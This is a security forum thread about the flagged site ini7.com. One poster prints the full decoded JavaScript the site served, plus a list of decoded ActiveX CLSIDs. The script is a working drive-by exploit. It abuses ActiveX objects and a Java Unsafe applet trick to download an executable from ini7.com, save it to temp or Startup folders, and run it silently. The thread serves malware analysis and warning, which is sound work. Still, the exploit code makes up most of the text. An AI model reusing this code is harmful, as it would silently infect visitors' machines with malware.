ini7.com

[cconniejean]

<iframe src=hxxp://ini7.com/lc10092.html width=2 height=2 style=display:none></iframe>

Exploit: Javascript Obfuscation
    This web site has JavaScript that has been used to obfuscate known exploit techniques.

This all the information ExploitLabs gives me and I doing a google search doesn't show much, not even listed at McAfee SiteAdvisor.

[MysteryFCM]

Script decodes to;

Code: [Select]

<applet code=animan.class name=maniman height=1 width=1 MAYSCRIPT></applet>
<div id=gHVGmTbb></div>
<script language="JavaScript" defer>
var CT='other';
if(document.all) {
document.all[0].style.behavior = 'url("#default#clientCaps")';
if(document.all[0].connectionType=='modem') { CT='modem'; }
}
var tLcYIKX = hLxTk("aHR0cDovL2luaTcuY29tLw==");
function LyRONoHV(o, n)
{
var r = null;
try { eval('r = o.CreateObject(n)') } catch(e){}
if (!r) {try { eval('r = o.CreateObject(n, "")') } catch(e){}}
if (!r) {try { eval('r = o.CreateObject(n, "", "")') } catch(e){}}
if (!r) {try { eval('r = o.GetObject("", n)') } catch(e){}}
if (!r) {try { eval('r = o.GetObject(n, "")') } catch(e){}}
if (!r) {try { eval('r = o.GetObject(n)') } catch(e){}}
return(r);
}
function OjWHT(a, ii, uu)
{
var xml = null;
var ws,o,ee,dat;
var bin = "\\"+ii+"10092.e"+"xe";
var dd;
try
{
xml = new XMLHttpRequest();
} catch(e) {
try
{
xml = new ActiveXObject(hLxTk("TWljcm9zb2Z0LlhNTEhUVFA="));
} catch(e) {
try
{
xml = new ActiveXObject(hLxTk("TVNYTUwyLlhNTEhUVFA="));
} catch(e) {
try
{
xml = new ActiveXObject(hLxTk("TVNYTUwyLlNlcnZlclhNTEhUVFA="));
} catch(e) { return(-1); }
}
}
}
if (!xml) return(-1);
try
{
ws = LyRONoHV(a, hLxTk("V1NjcmlwdC5TaGVsbA=="));
o = LyRONoHV(a, hLxTk("QURPREIuU3RyZWFt"));
xml.open("G"+"ET", uu, false);
xml.send(null);
dat = xml.responseBody;
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
} catch(e) { return(-1); }
try { dd = ee.Item("TE"+"MP"); ee = ws.Environment("Process"); o.SaveToFile(dd+bin, 2); } catch(e) {
try { dd = ws.SpecialFolders("Startup"); o.SaveToFile(dd+bin, 2); } catch(e) {
try { dd = ws.SpecialFolders("AllUsersStartup"); o.SaveToFile(dd+bin, 2); } catch(e) {
try { dd = "\\RECYCLER\\"; o.SaveToFile(dd+bin, 2); } catch(e) {
try { dd = "\\RECYCLED\\"; o.SaveToFile(dd+bin, 2); } catch(e) {
try { dd = "\\"; o.SaveToFile(dd+bin, 2); } catch(e) {
return(-1);
}
}
}
}
}
}
try { ws.Run(dd+bin,0); } catch(e) {
try { ws.Exec(dd+bin); } catch(e) {
try { ws = LyRONoHV(a, "Shell.Application"); ws.ShellExecute(dd+bin); } catch(e) {
try { ws = "gHVGmTbb.innerHTML=\"<object classid='cl"+"sid:527"+"196a4-b1a3-4647-931d-37ba5"+"af23037' codebase='\"+dd+bin+\"'></ob"+"ject>\";"; eval(ws); } catch(e) {
return(-1);
}
}
}
}
return(1);
}
function lZbkOGBy(ii, uu)
{
var i = 0;
var t = new Array('e0JEOTZDNTU2LTY1QTMtMTFEMC05ODNBLTAwQzA0RkMyOUUzNn0=','e0FCOUJDRURELUVDN0UtNDdFMS05MzIyLUQ0QTIxMDYxNzExNn0=','ezAwMDZGMDMzLTAwMDAtMDAwMC1DMDAwLTAwMDAwMDAwMDA0Nn0=','ezAwMDZGMDNBLTAwMDAtMDAwMC1DMDAwLTAwMDAwMDAwMDA0Nn0=','ezZlMzIwNzBhLTc2NmQtNGVlNi04NzljLWRjMWZhOTFkMmZjM30=','ezY0MTQ1MTJCLUI5NzgtNDUxRC1BMEQ4LUZDRkRGMzNFODMzQ30=','ezdGNUI3RjYzLUYwNkYtNDMzMS04QTI2LTMzOUUwM0MwQUUzRH0=','ezA2NzIzRTA5LUY0QzItNDNjOC04MzU4LTA5RkNEMURCMDc2Nn0=','ezYzOUY3MjVGLTFCMkQtNDgzMS1BOUZELTg3NDg0NzY4MjAxMH0=','e0JBMDE4NTk5LTFEQjMtNDRmOS04M0I0LTQ2MTQ1NEM4NEJGOH0=','e0QwQzA3RDU2LTdDNjktNDNGMS1CNEEwLTI1RjVBMTFGQUIxOX0=','e0U4Q0NDRERGLUNBMjgtNDk2Yi1CMDUwLTZDMDdDOTYyNDc2Qn0=', null);
var a,z;

while (t[i]) {
a = null;
z = hLxTk(t[i]);
if (z.substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("id", "oRDS"+i);
a.setAttribute("classid", "clsid:" + z.substring(1, z.length - 1));
} else {
try { a = new ActiveXObject(z); } catch(e){}
}
if (a) {
try
{
var b = LyRONoHV(a, "WScr"+"ipt.S"+"hell");
if (b) {
if (OjWHT(a, ii, uu) == 1) return(1);
}
} catch(e){}
}
i++;
}
return(-1);
}
function SGiwcV()
{
try {
var unsafeclass = document.maniman.getClass().forName("sun.misc.Unsafe");
var unsafemeth = unsafeclass.getMethod("getUnsafe", null);
var unsafe = unsafemeth.invoke(unsafemeth, null);
document.maniman.foobar(unsafe);
var chenref = unsafe.defineClass("omfg", document.maniman.luokka, 0, document.maniman.classSize);
var chen = unsafe.allocateInstance(chenref);
chen.setURLdl(tLcYIKX);chen.setUname("10092");chen.setCID(CT);
chen.perse(unsafe);
} catch (d) {return(-1);}
return(1);
}
function CWXhIF()
{
document.write("<applet archive=Java2SE.jar code=Java2SE.class width=1 height=1 MAYSCRIPT><param name=usid value=10092><param name=uu value="+tLcYIKX+"><param name=tt value="+CT+"></applet>");
document.write("<applet archive=dsbr.jar code=MagicApplet.class width=1 height=1 name=dsbr MAYSCRIPT><param name=ModulePath value="+tLcYIKX+"?id=10092&t="+CT+"&o=2></applet>");
return(1);
}
if (lZbkOGBy('wn', tLcYIKX+"?id=10092&t="+CT+"&o=0") != 1) {
if (SGiwcV() != 1) {
CWXhIF();
document.write("see figure one");
}
}
</script>

Detected by AntiVir as HTML/Rce.Gen

[cconniejean]

Thank you.

[MysteryFCM]

My pleasure

There's also Base64 strings in the above that I didn't take the time to decode, but needless to say it's an ani exploit that uses MSXML.

The array of Base64 strings (line beginning "var t = new Array"), is an array of CLSID's ...... you can use vURL DE or Malzilla (amongst others), if you want to decode them.

/edit

Meatloaf concert is having a break so I figured what the heck, lol ...... CLSIDs are;

Code: [Select]

{BD96C556-65A3-11D0-983A-00C04FC29E36}
{AB9BCEDD-EC7E-47E1-9322-D4A210617116}
{0006F033-0000-0000-C000-000000000046}
{0006F03A-0000-0000-C000-000000000046}
{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}
{6414512B-B978-451D-A0D8-FCFDF33E833C}
{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
{06723E09-F4C2-43c8-8358-09FCD1DB0766}
{639F725F-1B2D-4831-A9FD-874847682010}
{BA018599-1DB3-44f9-83B4-461454C84BF8}
{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
{E8CCCDDF-CA28-496b-B050-6C07C962476B}